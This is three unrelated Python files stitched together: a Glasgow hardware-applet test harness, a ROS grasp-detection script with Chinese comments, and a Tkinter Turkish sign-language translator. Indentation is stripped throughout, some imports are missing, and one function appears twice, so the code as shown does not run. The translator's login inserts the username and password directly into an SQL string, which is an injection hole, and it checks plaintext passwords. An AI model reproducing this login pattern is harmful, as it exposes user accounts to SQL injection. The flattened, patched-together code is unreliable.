from nmigen.back.pysim import *
from ..access.simulation import *
from ..access.direct import *
from ..target.simulation import *
from ..target.hardware import *
from ..device.simulation import *
from ..device.hardware import *
from ..platform.all import GlasgowPlatformRevAB
__all__ += ["GlasgowAppletTestCase", "synthesis_test", "applet_simulation_test",
"applet_hardware_test"]
class MockRecorder:
def __init__(self, case, mocked, fixture):
self.__case = case
self.__mocked = mocked
self.__fixture = fixture
@staticmethod
def __dump_object(obj):
if isinstance(obj, bytes):
return {"__class__": "bytes", "hex": obj.hex()}
if isinstance(obj, bytearray):
return {"__class__": "bytearray", "hex": obj.hex()}
raise TypeError("%s is not serializable" % type(obj))
def __dump_stanza(self, stanza):
if not self.__case._recording:
return
json.dump(fp=self.__fixture, default=self.__dump_object, obj=stanza)
self.__fixture.write("\n")
def __dump_method(self, method, args, kwargs, result, coro):
self.__dump_stanza({
"method": method,
"async": coro,
"args": args,
"kwargs": kwargs,
"result": result
})
def __getattr__(self, attr):
mocked = getattr(self.__mocked, attr)
if inspect.ismethod(mocked):
def wrapper(*args, **kwargs):
result = mocked(*args, **kwargs)
if inspect.isawaitable(result):
async def coro_wrapper():
coro_result = await result
self.__dump_method(attr, args, kwargs, coro_result, coro=True)
return coro_result
return coro_wrapper()
else:
self.__dump_method(attr, args, kwargs, result, coro=False)
return result
return wrapper
return mocked
class MockReplayer:
def __init__(self, case, fixture):
self.__case = case
self.__fixture = fixture
@staticmethod
def __load_object(obj):
if "__class__" not in obj:
return obj
if obj["__class__"] == "bytes":
return bytes.fromhex(obj["hex"])
if obj["__class__"] == "bytearray":
return bytearray.fromhex(obj["hex"])
assert False
def __load(self):
json_str = self.__fixture.readline()
return json.loads(s=json_str, object_hook=self.__load_object)
def __getattr__(self, attr):
json_obj = self.__load()
self.__case.assertEqual(attr, json_obj["method"])
if json_obj["async"]:
async def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
else:
def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
return mock
class GlasgowAppletTestCase(unittest.TestCase):
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.test_cls = cls
cls.applet_cls = applet
def setUp(self):
self.applet = self.applet_cls()
def assertBuilds(self, access="direct", args=[]):
if access == "direct":
target = GlasgowHardwareTarget(revision="A0",
multiplexer_cls=DirectMultiplexer)
access_args = DirectArguments(applet_name=self.applet.name,
default_port="AB", pin_count=16)
else:
raise NotImplementedError
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
try:
parsed_args = parser.parse_args(args)
except SystemExit:
raise AssertionError("argument parsing failed") from None
self.applet.build(target, parsed_args)
target.build_plan().execute()
def _prepare_applet_args(self, args, access_args, interact=False):
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
self.applet.add_run_arguments(parser, access_args)
if interact:
self.applet.add_interact_arguments(parser)
self._parsed_args = parser.parse_args(args)
def _prepare_simulation_target(self):
self.target = GlasgowSimulationTarget()
self.target.submodules.multiplexer = SimulationMultiplexer()
self.device = GlasgowSimulationDevice(self.target)
self.device.demultiplexer = SimulationDemultiplexer(self.device)
def build_simulated_applet(self):
self.applet.build(self.target, self._parsed_args)
async def run_simulated_applet(self):
return await self.applet.run(self.device, self._parsed_args)
def _prepare_hardware_target(self, case, fixture, mode):
assert mode in ("record", "replay")
if mode == "record":
self.device = None # in case the next line raises
self.device = GlasgowHardwareDevice()
self.device.demultiplexer = DirectDemultiplexer(self.device, pipe_count=1)
revision = self.device.revision
else:
self.device = None
revision = "A0"
self.target = GlasgowHardwareTarget(revision=revision,
multiplexer_cls=DirectMultiplexer)
self.applet.build(self.target, self._parsed_args)
self._recording = False
self._recorders = []
old_run_lower = self.applet.run_lower
async def run_lower(cls, device, args):
if mode == "record":
lower_iface = await old_run_lower(cls, device, args)
recorder = MockRecorder(case, lower_iface, fixture)
self._recorders.append(recorder)
return recorder
if mode == "replay":
return MockReplayer(case, fixture)
self.applet.run_lower = run_lower
async def run_hardware_applet(self, mode):
if mode == "record":
await self.device.download_target(self.target.build_plan())
return await self.applet.run(self.device, self._parsed_args)
def synthesis_test(case):
synthesis_available = GlasgowPlatformRevAB().has_required_tools()
return unittest.skipUnless(synthesis_available, "synthesis not available")(case)
def applet_simulation_test(setup, args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
access_args = SimulationArguments(self.applet)
self._prepare_applet_args(args, access_args)
self._prepare_simulation_target()
getattr(self, setup)()
@asyncio.coroutine
def run():
yield from case(self)
sim = Simulator(self.target)
sim.add_clock(1e9)
sim.add_sync_process(run)
vcd_name = "{}.vcd".format(case.__name__)
with sim.write_vcd(vcd_name):
sim.run()
os.remove(vcd_name)
return wrapper
return decorator
def applet_hardware_test(setup="run_hardware_applet", args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
fixture_path = os.path.join(os.path.dirname(case.__code__.co_filename), "fixtures",
case.__name__ + ".json")
os.makedirs(os.path.dirname(fixture_path), exist_ok=True)
if os.path.exists(fixture_path):
fixture = open(fixture_path, "r")
mode = "replay"
else:
fixture = open(fixture_path, "w")
mode = "record"
try:
access_args = DirectArguments(self.applet, default_port="AB", pin_count=16)
self._prepare_applet_args(args, access_args)
self._prepare_hardware_target(self, fixture, mode)
exception = None
def run_test():
try:
loop = asyncio.new_event_loop()
iface = loop.run_until_complete(getattr(self, setup)(mode))
self._recording = True
loop.run_until_complete(case(self, iface))
except Exception as e:
nonlocal exception
exception = e
finally:
if self.device is not None:
loop.run_until_complete(self.device.demultiplexer.cancel())
thread = threading.Thread(target=run_test)
thread.start()
thread.join()
if exception is not None:
raise exception
except:
if mode == "record":
os.remove(fixture_path)
raise
finally:
if mode == "record":
if self.device is not None:
self.device.close()
return wrapper
return decorator
|
test.py
|
import rospy
from sensor_msgs.msg import PointCloud2
from visualization_msgs.msg import MarkerArray
from visualization_msgs.msg import Marker
import tf
import numpy as np
#自定义pointcloud包
import pointclouds
#from pcl import PointCloud
#自定义
import voxelgrid
import pcl
from autolab_core import YamlConfig
from dexnet.grasping import RobotGripper
from dexnet.grasping import GpgGraspSamplerPcl
import os
from pyquaternion import Quaternion
import sys
from os import path
import time
from scipy.stats import mode
import multiprocessing as mp
try:
from gpd_grasp_msgs.msg import GraspConfig
from gpd_grasp_msgs.msg import GraspConfigList
except ImportError:
print("Please install grasp msgs from https://github.com/TAMS-Group/gpd_grasp_msgs in your ROS workspace")
exit()
try:
from mayavi import mlab
except ImportError:
print("Can not import mayavi")
mlab = None
# global config:全局的配置文件
yaml_config = YamlConfig(os.environ['HOME'] + "/code/PointNetGPD/dex-net/test/config.yaml")
gripper_name = 'robotiq_85'
#加载夹爪
gripper = RobotGripper.load(gripper_name, os.environ['HOME'] + "/code/PointNetGPD/dex-net/data/grippers")
ags = GpgGraspSamplerPcl(gripper, yaml_config)
#using_mp=True
using_mp=True
show_single=True
show_mp=True
num_grasps=10
num_workers=10
max_num_samples=50
marker_life_time = 20
rospy.set_param("/robot_at_home", "true")
def cal_grasp(msg, cam_pos_):
"""根据在线采集的点云计算候选的抓取姿态
"""
#把pointcloud2类型的消息点云,转换为ndarray points_
points_ = pointclouds.pointcloud2_to_xyz_array(msg)
#复制一份points_ ndarray对象,并将所有的点坐标转换为float32类型
points_ = points_.astype(np.float32)
remove_white = False
if remove_white:
points_ = remove_white_pixel(msg, points_, vis=True)
# begin voxel points
n = 500 # parameter related to voxel method
# gpg improvements, highlights: flexible n parameter for voxelizing.
#这一句话执行的时候,不能打开虚拟机,否则容易卡住
points_voxel_ = get_voxel_fun(points_, n)
#当点云点数小于2000时
if len(points_) < 2000: # should be a parameter
while len(points_voxel_) < len(points_)-15:
points_voxel_ = get_voxel_fun(points_, n)
n = n + 100
rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
#这里,算是将点云进行了voxel降采样
points_ = points_voxel_
remove_points = False
#是否剔除支撑平面
if remove_points:
points_ = remove_table_points(points_, vis=True)
#重新构造经过“降采样”的点云
point_cloud = pcl.PointCloud(points_)
print(len(points_))
#构造法向量估计对象
norm = point_cloud.make_NormalEstimation()
tree=point_cloud.make_kdtree()
norm.set_SearchMethod(tree)
#以周边30个点作为法向量计算点
norm.set_KSearch(10) # critical parameter when calculating the norms
normals = norm.compute()
#将点云法向量转换为ndarry类型
surface_normal = normals.to_array()
surface_normal = surface_normal[:, 0:3]
#每个点到 相机位置(无姿态)的向量 但是,感觉是相机到点的向量
vector_p2cam = cam_pos_ - points_
#print(vector_p2cam)
#print(cam_pos_)
"""
np.linalg.norm(vector_p2cam, axis=1) 默认求2范数,axis=1 代表按行向量处理,求多个行向量的2范数(求模)
np.linalg.norm(vector_p2cam, axis=1).reshape(-1, 1) 将其调整为m行 1列
整句话的含义是,将vector_p2cam归一化,单位化
"""
vector_p2cam = vector_p2cam / np.linalg.norm(vector_p2cam, axis=1).reshape(-1, 1)
#将表面法相与表面法相(都是单位向量)点乘,以备后面计算向量夹角
tmp = np.dot(vector_p2cam, surface_normal.T).diagonal()
#print(vector_p2cam)
#print(surface_normal.T)
#print(tmp)
"""
np.clip(tmp, -1.0, 1.0) 截取函数,将tmp中的值,都限制在-1.0到1.0之间,大于1的变成1,小于-1的记为-1
np.arccos() 求解反余弦,求夹角
"""
angel = np.arccos(np.clip(tmp, -1.0, 1.0))
#print(angel)
#找到与视角向量夹角大于90度的角(认为法向量计算错误)
wrong_dir_norm = np.where(angel > np.pi * 0.5)[0]
#print(np.where(angel > np.pi * 0.5))
#print(wrong_dir_norm)
#print(len(wrong_dir_norm))
#创建一个len(angel)行,3列的ndarry对象
tmp = np.ones([len(angel), 3])
#将法向量错误的行的元素都改写为-1
tmp[wrong_dir_norm, :] = -1
#与表面法相元素对元素相乘,作用是将"错误的"法向量的方向 扭转过来
surface_normal = surface_normal * tmp
#选取桌子以上2cm处的点作为检测点
select_point_above_table = 0.070
#modify of gpg: make it as a parameter. avoid select points near the table.
#查看每个点的z方向,如果它们的点z轴方向的值大于select_point_above_table,就把他们抽出来
points_for_sample = points_[np.where(points_[:, 2] > select_point_above_table)[0]]
print("待抓取的点数量为{}".format(len(points_for_sample)))
if len(points_for_sample) == 0:
rospy.loginfo("Can not seltect point, maybe the point cloud is too low?")
return [], points_, surface_normal
yaml_config['metrics']['robust_ferrari_canny']['friction_coef'] = 0.4
if not using_mp:
rospy.loginfo("Begin cal grasps using single thread, slow!")
"""
"""
grasps_together_ = ags.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps,
max_num_samples=max_num_samples, show_final_grasp=show_single)
else:
# begin parallel grasp:
rospy.loginfo("Begin cal grasps using parallel!")
def grasp_task(num_grasps_, ags_, queue_):
ret = ags_.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps_,
max_num_samples=max_num_samples, show_final_grasp=False)
queue_.put(ret)
queue = mp.Queue()
num_grasps_p_worker = int(num_grasps/num_workers)
workers = [mp.Process(target=grasp_task, args=(num_grasps_p_worker, ags, queue)) for _ in range(num_workers)]
[i.start() for i in workers]
grasps_together_ = []
for i in range(num_workers):
grasps_together_ = grasps_together_ + queue.get()
rospy.loginfo("Finish mp processing!")
#显示多线程的抓取计算结果
if show_mp:
ags.show_all_grasps(points_, grasps_together_)
ags.show_points(points_, scale_factor=0.002)
mlab.show()
rospy.loginfo("Grasp sampler finish, generated {} grasps.".format(len(grasps_together_)))
#返回抓取(主要是抓取坐标系) 全部场景点 以及pcl计算的点云表面法向量
return grasps_together_, points_, surface_normal
def show_grasp_marker(marker_array_, real_grasp_, gripper_, color_, lifetime_):
"""
show grasp using marker使用marker来显示抓取
:param marker_array_: marker array
:param real_grasp_: [0] position, [1] approach [2] binormal [3] minor pc
:param gripper_: gripper parameter of a grasp
:param color_: color of the gripper 显示夹爪的颜色
:param lifetime_: time for showing the maker marker的显示时间长短
:return: return add makers to the maker array
"""
hh = gripper_.hand_height
fw = gripper_.real_finger_width
hod = gripper_.hand_outer_diameter
hd = gripper_.real_hand_depth
open_w = hod - fw * 2
approach = real_grasp_[1]
binormal = real_grasp_[2]
minor_pc = real_grasp_[3]
grasp_bottom_center = real_grasp_[4] - approach * (gripper_.real_hand_depth - gripper_.hand_depth)
rotation = np.vstack([approach, binormal, minor_pc]).T
qua = Quaternion(matrix=rotation)
marker_bottom_pos = grasp_bottom_center - approach * hh * 0.5
marker_left_pos = grasp_bottom_center - binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
marker_right_pos = grasp_bottom_center + binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
show_marker(marker_array_, marker_bottom_pos, qua, np.array([hh, hod, hh]), color_, lifetime_)
show_marker(marker_array_, marker_left_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
show_marker(marker_array_, marker_right_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
def show_grasp_marker(marker_array_, real_grasp_, gripper_, color_, lifetime_):
"""
show grasp using marker使用marker来显示抓取
:param marker_array_: marker array
:param real_grasp_: [0] position, [1] approach [2] binormal [3] minor pc
:param gripper_: gripper parameter of a grasp
:param color_: color of the gripper 显示夹爪的颜色
:param lifetime_: time for showing the maker marker的显示时间长短
:return: return add makers to the maker array
"""
hh = gripper_.hand_height
fw = gripper_.real_finger_width
hod = gripper_.hand_outer_diameter
hd = gripper_.real_hand_depth
open_w = hod - fw * 2
approach = real_grasp_[1]
binormal = real_grasp_[2]
minor_pc = real_grasp_[3]
grasp_bottom_center = real_grasp_[4] - approach * (gripper_.real_hand_depth - gripper_.hand_depth)
rotation = np.vstack([approach, binormal, minor_pc]).T
qua = Quaternion(matrix=rotation)
marker_bottom_pos = grasp_bottom_center - approach * hh * 0.5
marker_left_pos = grasp_bottom_center - binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
marker_right_pos = grasp_bottom_center + binormal * (open_w * 0.5 + fw * 0.5) + hd * 0.5 * approach
show_marker(marker_array_, marker_bottom_pos, qua, np.array([hh, hod, hh]), color_, lifetime_)
show_marker(marker_array_, marker_left_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
show_marker(marker_array_, marker_right_pos, qua, np.array([hd, fw, hh]), color_, lifetime_)
def remove_grasp_outside_tray(grasps_, points_):
x_min = points_[:, 0].min()
x_max = points_[:, 0].max()
y_min = points_[:, 1].min()
y_max = points_[:, 1].max()
valid_grasp_ind_ = []
for i in range(len(grasps_)):
grasp_bottom_center = grasps_[i][4]
approach_normal = grasps_[i][1]
major_pc = grasps_[i][2]
hand_points_ = ags.get_hand_points(grasp_bottom_center, approach_normal, major_pc)
finger_points_ = hand_points_[[1, 2, 3, 4, 9, 10, 13, 14], :]
# aa = points_[:, :2] - finger_points_[0][:2] # todo: work of remove outside grasp not finished.
# from IPython import embed;embed()
a = finger_points_[:, 0] < x_min
b = finger_points_[:, 0] > x_max
c = finger_points_[:, 1] < y_min
d = finger_points_[:, 1] > y_max
if np.sum(a) + np.sum(b) + np.sum(c) + np.sum(d) == 0:
valid_grasp_ind_.append(i)
grasps_inside_ = [grasps_[i] for i in valid_grasp_ind_]
rospy.loginfo("gpg got {} grasps, after remove grasp outside tray, {} grasps left".format(len(grasps_),
len(grasps_inside_)))
return grasps_inside_
def get_voxel_fun(points_, n):
get_voxel = voxelgrid.VoxelGrid(points_, n_x=n, n_y=n, n_z=n)
get_voxel.compute()
points_voxel_ = get_voxel.voxel_centers[get_voxel.voxel_n]
points_voxel_ = np.unique(points_voxel_, axis=0)
return points_voxel_
def show_marker(marker_array_, pos_, ori_, scale_, color_, lifetime_):
"""显示标注物体
"""
marker_ = Marker()
marker_.header.frame_id = "/ar_marker_6"
# marker_.header.stamp = rospy.Time.now()
marker_.type = marker_.CUBE
marker_.action = marker_.ADD
marker_.pose.position.x = pos_[0]
marker_.pose.position.y = pos_[1]
marker_.pose.position.z = pos_[2]
marker_.pose.orientation.x = ori_[1]
marker_.pose.orientation.y = ori_[2]
marker_.pose.orientation.z = ori_[3]
marker_.pose.orientation.w = ori_[0]
marker_.lifetime = rospy.Duration.from_sec(lifetime_)
marker_.scale.x = scale_[0]
marker_.scale.y = scale_[1]
marker_.scale.z = scale_[2]
marker_.color.a = 0.5
red_, green_, blue_ = color_
marker_.color.r = red_
marker_.color.g = green_
marker_.color.b = blue_
marker_array_.markers.append(marker_)
if __name__ == '__main__':
rospy.init_node('grasp_tf_broadcaster', anonymous=True)
#创建发布器
pub1 = rospy.Publisher('gripper_vis', MarkerArray, queue_size=1)
#发布检测到的抓取
pub2 = rospy.Publisher('/detect_grasps/clustered_grasps', GraspConfigList, queue_size=1)
#
pub3 = rospy.Publisher('/test_points', PointCloud2, queue_size=1)
rate = rospy.Rate(10)
#cam_pos列表
cam_pos = []
#创建TF监听器
listener = tf.TransformListener()
#是否得到变换的标志位
get_transform = False
#等待tf中查找到'/table_top'与'/kinect2_ir_optical_frame'
# 两个坐标系之间的变换关系
while not get_transform:
try:
#尝试查看kinect2相机与桌子之间的转换?
#cam_pos, _ = listener.lookupTransform('/table_top', '/kinect2_ir_optical_frame', rospy.Time(0))
#cam_pos代表的是相机的trans,不是rot
cam_pos, _ = listener.lookupTransform('/ar_marker_6', '/kinect2_rgb_optical_frame', rospy.Time(0))
get_transform = True
rospy.loginfo("got transform complete")
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
while not rospy.is_shutdown():
rospy.loginfo("rospy is waiting for message: /table_top_points")
"""点云数据的名称是/table_top_points
对象是kinect_data 类形是 PointCloud2类型
"""
#kinect_data = rospy.wait_for_message("/table_top_points", PointCloud2)
kinect_data_ = rospy.wait_for_message("/table_top_points", PointCloud2)
kinect_data = rospy.wait_for_message("/table_top_points_subsampled", PointCloud2)
real_good_grasp = []
real_bad_grasp = []
real_score_value = []
if kinect_data.data == '':
rospy.loginfo("There is no points on the table, waiting...")
continue
#获取当前文件所在目录(文件夹)的绝对路径
path=os.path.dirname(os.path.abspath(__file__))
#更改(确保)当前所在目录是工作目录
os.chdir(path)
"""根据Kinect读取到的场景点云,使用gpd检测候选的抓取?
输入:
kinect_data读取的点云数据
cam_pos Kinect与桌子标签之间的距离
real_grasp 猜测此时的
points
normals_cal
"""
real_grasp, points, normals_cal = cal_grasp(kinect_data, cam_pos)
#托盘,如果有托盘?
if True:
#real_grasp 去除外部托盘导致的抓取;
real_grasp = remove_grasp_outside_tray(real_grasp, points)
#估计一个抓取中的点数
check_grasp_points_num = True # evaluate the number of points in a grasp
"""
等效于
if check_grasp_points_num:
check_hand_points_fun(real_grasp)
else:
0
"""
#check_hand_points_fun(real_grasp) if check_grasp_points_num else 0
#计算,每个抓取,夹爪内部的点云
#in_ind, in_ind_points = collect_pc(real_grasp, points)
score = [] # should be 0 or 1
score_value = [] # should be float [0, 1]
ind_good_grasp = []
ind_bad_grasp = []
#记录好的抓取的数量,以及坏的抓取数量
print("Got {} grasps".format(len(real_grasp)))
real_bad_grasp = real_grasp
# end of grasp detection抓取检测部分结束
marker_array = MarkerArray()
marker_array_single = MarkerArray()
grasp_msg_list = GraspConfigList()
for i in range(len(real_bad_grasp)):
show_grasp_marker(marker_array, real_bad_grasp[i], gripper, (1, 0, 0), marker_life_time)
id_ = 0
for m in marker_array.markers:
m.id = id_
id_ += 1
grasp_msg_list.header.stamp = rospy.Time.now()
grasp_msg_list.header.frame_id = "/ar_marker_6"
# from IPython import embed;embed()
if True:
i = 0
for m in marker_array_single.markers:
m.id = id_
id_ += 1
pub1.publish(marker_array)
rospy.sleep(4)
pub1.publish(marker_array_single)
rospy.loginfo(" Publishing grasp pose to rviz using marker array and good grasp pose")
rate.sleep()
|
userInterface.py
|
import sqlite3
import threading
import time
import tkinter as tk
from tkinter import INSERT
from tkinter import Menu
from tkinter import messagebox as msg
from tkinter import ttk
from tkinter import END
from tkinter import scrolledtext
import cv2
from PIL import ImageTk, Image
from tensorflow.keras.models import model_from_json
import operator
class ThreadRunner:
"""
ThreadRunner runs the process to get the current frame from the video source
and it uses the trained model to predict characters from hands on the video
source. The process had to be separated from the UI thread to avoid freezes.
There are three methods to get frame, roi frame and predicted text
get_frame() -> gets the current frame
get_roi_frame() -> gets the current roi frame
get_prediction() -> gets the current predicted text
"""
def __init__(self, video_source=0, width=None, height=None, fps=None):
self.video_source = video_source
self.width = width
self.height = height
self.fps = fps
# Open the video source
self.vid = cv2.VideoCapture(video_source)
if not self.vid.isOpened():
raise ValueError("ThreadRunner Unable to open video source", video_source)
# Set the height according to the width
if self.width and not self.height:
ratio = self.width / self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)
self.height = int(self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT) * ratio)
# Get video source width and height if width and height are not set
if not self.width:
self.width = int(self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)) # convert float to int
if not self.height:
self.height = int(self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)) # convert float to int
if not self.fps:
self.fps = int(self.vid.get(cv2.CAP_PROP_FPS)) # convert float to int
# set rectangle points relatively with the source width and height
self.recX1 = int(self.width * 0.5)
self.recY1 = int(self.width * 0.10)
self.recX2 = int(self.width * 0.95)
self.recY2 = int(self.width * 0.50)
# default required values at start
self.ret = False
self.frame = None
self.roi = None
self.roi_ret = False
self.roi_frame = None
self.running = True
self.model = None
self.predicted_text = ""
self.categories = {0: '0', 1: '1', 2: '2', 3: '3', 4: '4',
5: '5', 6: '6', 7: '7', 8: '8', 9: '9',
10: 'A', 11: 'B', 12: 'C', 13: 'D', 14: 'E',
15: 'F', 16: 'G', 17: 'H', 18: 'I', 19: 'K',
20: 'L', 21: 'M', 22: 'N', 23: 'O', 24: 'P',
25: 'R', 26: 'S', 27: 'T', 28: 'U', 29: 'V',
30: 'Y', 31: 'Z'}
self.prediction_result = None
self.current_prediction = None
self.prediction_count = 0
self.process_timer = 0
# start thread
self.thread = threading.Thread(target=self.process)
self.thread.start()
def process(self):
# get the model from json and load the weights
with open("model-bw.json", "r") as mj:
self.model = model_from_json(mj.read())
self.model.load_weights("model-bw.h5")
# start video streaming and predicting process
while self.running:
ret, frame = self.vid.read()
if ret:
# process image
frame = cv2.resize(frame, (self.width, self.height))
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.flip(frame, flipCode=1)
cv2.rectangle(frame, (self.recX1, self.recY1), (self.recX2, self.recY2), (255, 255, 0), 1)
self.roi = frame[self.recY1:self.recY2, self.recX1:self.recX2]
self.roi = cv2.resize(self.roi, (64, 64))
self.roi = cv2.cvtColor(self.roi, cv2.COLOR_BGR2GRAY)
roi_ret, roi_frame = cv2.threshold(self.roi, 120, 255, cv2.THRESH_BINARY)
self.prediction_result = self.model.predict(roi_frame.reshape(1, 64, 64, 1))
prediction = {'0': self.prediction_result[0][0],
'1': self.prediction_result[0][1],
'2': self.prediction_result[0][2],
'3': self.prediction_result[0][3],
'4': self.prediction_result[0][4],
'5': self.prediction_result[0][5],
'6': self.prediction_result[0][6],
'7': self.prediction_result[0][7],
'8': self.prediction_result[0][8],
'9': self.prediction_result[0][9],
'A': self.prediction_result[0][10],
'B': self.prediction_result[0][11],
'C': self.prediction_result[0][12],
'D': self.prediction_result[0][13],
'E': self.prediction_result[0][14],
'F': self.prediction_result[0][15],
'G': self.prediction_result[0][16],
'H': self.prediction_result[0][17],
'I': self.prediction_result[0][18],
'K': self.prediction_result[0][19],
'L': self.prediction_result[0][20],
'M': self.prediction_result[0][21],
'N': self.prediction_result[0][22],
'O': self.prediction_result[0][23],
'P': self.prediction_result[0][24],
'R': self.prediction_result[0][25],
'S': self.prediction_result[0][26],
'T': self.prediction_result[0][27],
'U': self.prediction_result[0][28],
'V': self.prediction_result[0][29],
'Y': self.prediction_result[0][30],
'Z': self.prediction_result[0][31]
}
prediction = sorted(prediction.items(), key=operator.itemgetter(1), reverse=True)
imgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
ret_thresh, thresh = cv2.threshold(imgray, 127, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if len(contours) < 150:
if self.prediction_count == 0:
self.current_prediction = prediction[0][0]
if self.current_prediction == prediction[0][0]:
self.prediction_count += 1
else:
self.prediction_count = 0
if self.prediction_count < 10:
self.predicted_text = "Hold still..."
self.process_timer = 0
else:
self.predicted_text = prediction[0][0]
self.process_timer += 1
if self.process_timer > 20:
self.predicted_text += str(prediction[0][0])
self.process_timer = 0
print(self.predicted_text)
else:
self.predicted_text = "Can't detect!"
else:
print('ThreadRunner stream end:', self.video_source)
# TODO: reopen stream
self.running = False
break
# assign new frame
self.ret = ret
self.frame = frame
self.roi_ret = roi_ret
self.roi_frame = roi_frame
# sleep for next frame
time.sleep(1 / self.fps)
# get current frame
def get_frame(self):
return self.ret, self.frame
# get current roi frame
def get_roi_frame(self):
return self.roi_ret, self.roi_frame
# get the predicted text
def get_prediction(self):
return self.predicted_text
# Release the video source when the object is destroyed
def __del__(self):
# stop thread
if self.running:
self.running = False
self.thread.join()
# release stream
if self.vid.isOpened():
self.vid.release()
# Camera Frame object creates the camera frame and it updates
# the frame by getting the current frame from ThreadRunner object
class CameraFrame(tk.Frame):
def __init__(self, container, video_source=None, width=None, height=None):
super().__init__(container)
self.container = container
self.video_source = video_source
if not self.video_source:
self.video_source = 0
self.vid = ThreadRunner(self.video_source, width, height)
self.canvas = tk.Canvas(self, width=self.vid.width, height=self.vid.height)
self.canvas.pack()
self.delay = int(1000 / self.vid.fps)
print('CameraFrame source:', self.video_source)
print('CameraFrame fps:', self.vid.fps, 'delay:', self.delay)
self.image = None
self.running = True
self.update_frame()
def update_frame(self):
# widgets in tkinter already have method `update()` so I have to use different name -
# Get a frame from the video source
ret, frame = self.vid.get_frame()
if ret:
self.image = Image.fromarray(frame)
self.photo = ImageTk.PhotoImage(image=self.image)
self.canvas.create_image(0, 0, image=self.photo, anchor='nw')
if self.running:
self.container.after(self.delay, self.update_frame)
# RoiFrame object creates the frame for roi frame
# updated by ThreadRunner object
class RoiFrame(tk.Frame):
def __init__(self, container, video_capture, fps):
super().__init__(container)
self.container = container
self.video_capture = video_capture
self.fps = fps
self.canvas = tk.Canvas(self, width=64, height=64)
self.canvas.pack()
self.roi_frame = None
self.delay = int(1000 / self.fps)
self.running = True
self.isActive = True
self.image = None
self.update_roi_frame()
def update_roi_frame(self):
ret, self.roi_frame = self.video_capture.get_roi_frame()
if ret:
self.image = Image.fromarray(self.roi_frame)
self.photo = ImageTk.PhotoImage(image=self.image)
self.canvas.create_image(0, 0, image=self.photo, anchor='nw')
else:
self.isActive = False
if self.running:
self.container.after(self.delay, self.update_roi_frame)
# PredictedText object creates a tkinter label object and updates
# the text attribute of label according to the prediction
class PredictedText(tk.Label):
def __init__(self, container, video_capture, fps):
super().__init__(container)
self.container = container
self.video_capture = video_capture
self.fps = fps
self.predicting = True
self.label_text = ""
self.label = tk.Label(self, text="")
self.label.pack()
self.delay = int(25000 / self.fps)
self.update_label()
def update_label(self):
self.label.config(text=self.video_capture.get_prediction())
if self.predicting:
self.container.after(self.delay, self.update_label)
# PredictionText object creates a tkinter text object and
# concatenates the predicted text predicted by the model
class PredictionText(tk.Text):
def __init__(self, container, video_capture, fps):
super().__init__(container)
self.container = container
self.video_capture = video_capture
self.fps = fps
self.predicting = True
self.text_entry = ""
self.predicted_text = ""
self.text = tk.Text(self, width=30, height=3, wrap=tk.WORD)
self.text.pack()
self.delay = int(100000 / self.fps)
self.update_text()
def update_text(self):
self.predicted_text = self.video_capture.get_prediction()
if self.predicted_text != "Hold still..." and self.predicted_text != "Can't detect!":
self.text_entry = self.predicted_text
self.text.insert(END, self.text_entry)
if self.predicting:
self.container.after(self.delay, self.update_text)
class LoginWindow:
def __init__(self):
self.running = False
self.win = tk.Tk()
self.win.title("Login")
self.db = Database("database.db")
self.widgets()
def account_check(self):
if self.username.get() == "" or self.password.get() == "":
msg.showerror("Warning!", "Fields can not be empty!")
else:
userlist = self.db.queryFunction(
f"SELECT * FROM Users WHERE username = '{self.username.get()}' and password = '{self.password.get()}'")
if len(userlist) > 0:
self.win.destroy()
MainWindow(self.username)
else:
msg.showerror("Wrong user!", "User information did not match!")
def exit_window(self):
self.win.quit()
self.win.destroy()
exit()
def register_user(self):
RegisterUserWindow()
def widgets(self):
self.containerFrame = ttk.LabelFrame(self.win, text="Welcome to Turkish Sign Language Translator")
self.containerFrame.grid(column=0, row=0, padx=10, pady=10, sticky=tk.NSEW)
self.username_label = ttk.Label(self.containerFrame, text="Username:")
self.username_label.grid(column=0, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.username = tk.StringVar()
self.username_entry = ttk.Entry(self.containerFrame, textvariable=self.username)
self.username_entry.grid(column=1, row=1, padx=10, pady=5, sticky=tk.NSEW)
self.password_label = ttk.Label(self.containerFrame, text="Password:")
self.password_label.grid(column=0, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.password = tk.StringVar()
self.password_entry = ttk.Entry(self.containerFrame, show="*", textvariable=self.password)
self.password_entry.grid(column=1, row=2, padx=10, pady=5, sticky=tk.NSEW)
self.ok_button = ttk.Button(self.containerFrame, text="OK", command=self.account_check)
self.ok_button.grid(column=0, row=3, padx=10, pady=5, sticky=tk.NSEW)
self.cancel_button = ttk.Button(self.containerFrame, text="Cancel", command=self.exit_window)
self.cancel_button.grid(column=1, row=3, padx=10, pady=5, sticky=tk.NSEW)
